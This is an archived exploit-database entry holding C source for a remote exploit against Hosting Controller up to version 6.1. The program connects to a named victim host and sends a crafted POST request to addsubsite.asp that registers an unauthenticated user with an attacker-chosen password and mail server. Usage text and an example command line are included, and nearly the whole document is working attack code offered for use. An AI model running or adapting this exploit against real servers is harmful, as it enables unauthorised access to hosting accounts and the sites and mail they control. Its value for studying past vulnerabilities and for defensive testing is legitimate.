Hosting Controller 0.6.1 - User Registration (2)

EDB-ID:

987


Author:

Silentium

Type:

remote


Platform:

Windows

Date:

2005-05-07


/*****************************************************
*                                                    *
*  [Hosting Controller <= v6.1] exploit              *
*                                                    *
*  sileHOSTCxpl                                      *
*                                                    *
*  This exploit utilize two ways for exploiting      *
*  vulnerability present into Hosting Controller.    *
*  This exploit create new user with relative        *
*  passwd and registered your host with mail server  *
*  into Hosting Controller software ;\               *
*                                                    *
*  References: www.milw0rm.com/id.php?id=979         * 
*                                                    *
*  coded by: Silentium of Anacron Group Italy        *
*      date: 05/05/2005                              *
*    e-mail: anacrongroupitaly[at]autistici[dot]org  *
*   my_home: www.autistici.org/anacron.group-italy   *
*                                                    *
*  this tool is developed under GPL license          *
*  no(c) .:. copyleft                                *
*                                                    *
*****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT1 80		// port of web server 
#define PORT2 8077		// port of hosting controller

void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);


int main(int argc, char *argv[]){

FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;

type = atoi(argv[6]);

if(argc!=7 || (type < 1) || (type > 2))
   info();

banner();
   
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
   errsock();
   
   printf("[*] Creating socket		[OK]\n");

if((hp = gethostbyname(argv[1])) == NULL)
   errgeth();
   
   printf("[*] Resolving victim host	[OK]\n");
   
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;

if(type == 1)
   addr.sin_port = htons(PORT1);
else
   addr.sin_port = htons(PORT2);
   
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
   errconn(argv);
   
   printf("[*] Connecting at victim host   [OK]\n");
   
out = fdopen(sock,"a");
setbuf(out,NULL);

sendxpl(out,argv,type);

if(type == 1)
   printf("[*] Now test your username and password\n" 
          "    on http://%s/admin/\n\n",argv[1]);
else
   printf("[*] Now test your username and password\n"
          "    on http://%s:8077\n\n",argv[1]);

shutdown(sock,2);
close(sock);

return 0;

}


void info(void){

system("clear");
printf("\n\t         #########################################\n"
       "\t         #             sileHOSTCxpl              #\n"
       "\t         #  ###################################  #\n"
       "\t         #          Hosting Controller           #\n"
       "\t         #           <= v6.1 exploit             #\n"
       "\t         #   Unauthenticated User Registration   #\n"
       "\t         #          coded by Silentium           #\n"            
       "\t         #        [ Anacron Group Italy ]        #\n"
       "\t         #  ###################################  #\n"
       "\t         # www.autistici.org/anacron-group-italy #\n"
       "\t         #########################################\n\n"
       " [Usage]\n\n" 
       "  sileHOSTCxpl <victim> <username> <password> <your_host> <mailserver> <type>\n\n"
       "        [Type]\n\n"
       "              1) web server daemon	   [port 80]\n"
       "              2) hosting controller daemon [port 8077]\n\n"
       " [Example]\n\n"
       "  sileHOSTCxpl www.victim.com sile silePass anacrongroup.org imail 1\n\n"); 
exit(1);

}


void banner(void){

system("clear");
printf("[-] sileHOSTCxpl\n"
       "    ============\n"
       "[-] Hosting Controller <= v6.1 exploit\n"
       "[-] coded by Silentium - Anacron Group Italy\n"
       "[-] www.autistici.org/anacron-group-italy\n\n");
       
}
       

void sendxpl(FILE *out, char *argv[], int type){

int size = 132;

size+=strlen(argv[2]);
size+=strlen(argv[3]);
size+=strlen(argv[4]);
size+=strlen(argv[5]);
    
if(type == 1)    
    fprintf(out,"POST /admin/hosting/addsubsite.asp HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&"
                "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password"
                "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]); 
else
    fprintf(out,"POST /hosting/addsubsite.asp HTTP/1.0\n"
                "Connection: Keep-Alive\n"
                "Pragma: no-cache\n"
                "Cache-control: no-cache\n"
                "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
                "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
                "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
                "Accept-Language: en\n"
                "Host: %s\n"
                "Content-Type: application/x-www-form-urlencoded\n"
                "Content-Length: %d\n\n"
                "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&"
                "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password"
                "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]);
                                                                                                                                                                                                                                     
                                  
                 printf("[*] Sending exploit		[OK]\n\n");

}
            
                 
void errsock(void){

system("clear");
printf("[x] Creating socket	[FAILED]\n\n");
exit(1);

}


void errgeth(void){

printf("[x] Resolving victim host	[FAILED]\n\n");
exit(1);

}


void errconn(char *argv[]){

printf("[x] Connecting at victim host	[FAILED]\n\n",argv[1]);
exit(1);

}

// milw0rm.com [2005-05-07]